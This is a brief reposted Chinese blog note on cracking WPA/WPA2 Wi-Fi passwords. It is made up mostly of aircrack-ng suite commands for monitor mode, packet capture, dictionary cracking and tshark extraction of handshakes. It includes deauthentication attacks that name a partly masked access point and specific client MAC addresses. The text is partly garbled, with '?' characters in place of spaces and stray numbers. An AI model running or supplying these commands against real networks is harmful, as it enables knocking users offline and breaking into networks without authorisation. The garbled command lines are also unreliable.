2019独角兽企业重金招聘Python工程师标准>>>
airmon-ng ?start ?wlan0 ?激活网卡到monitor模式
airodump-ng -c 6 –w longas mon0
aireplay-ng -0 5 –a AP的mac -c 客户端的mac wlan0
aircrack-ng -w dic 捕获的cap文件
0e2d68
sudo aireplay-ng -0 5 -a ******2D:68 -c C8:F2:30?wlp3s0mon
sudo aireplay-ng -0 5 -a ******2D:68 -c 68:DB:CA?wlp3s0mon
Sometimes you have a very large capture file and would like to extract the WPA/WPA2 handshake packets from it to a separate file. The can be done with “tshark” which is a command line version of the Wireshark suite. Installing the linux version of the?Wireshark suite?on your system should also install tshark.
The following command will extract all handshake and beacon packets from your pcap capture file and create a separate file with just those packets:
tshark -r <input file name> -R "eapol || wlan.fc.type_subtype == 0x08" -w <output file name>Remember you must use a pcap file as input, not an IVs file.
转载于:https://my.oschina.net/mingyuejingque/blog/716985
00117266